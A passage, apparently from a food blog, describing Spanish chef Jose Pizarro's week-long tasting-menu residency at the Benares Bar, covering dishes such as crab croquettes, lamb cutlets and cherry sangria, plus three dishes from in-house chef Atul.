up people, Spanish chef extraordinaire Jose Pizarro has taken up residency at the Benares Bar as part of their Chef Season. Running for just one week only Jose has created a menu of 6 tasting dishes which include crab croquettes the best selling dish from Pizarro – crunchy balls filled with a creamy potato filling and crab pieces.

Other highlights include the tender BBQ Lamb cutlets with honey, mustard and rosemary served with allioli and the juicy prawns cooked with chilli, garlic and mango. Jose has also created a cocktail to be served alongside the menu, a cherry sangria which is a rich, wintery drink and a dessert of Santiago Cake and Saffron ice-cream.

If you fancy yourself as a bit of a culture vulture and want to hop from Spain to India, the menu also features three of the restaurant’s inhouse chef Atul’s dishes; a flavoursome Bengali Style Potato cake, the salty soft shell crab and a spicy Lamb Seek Kebab.
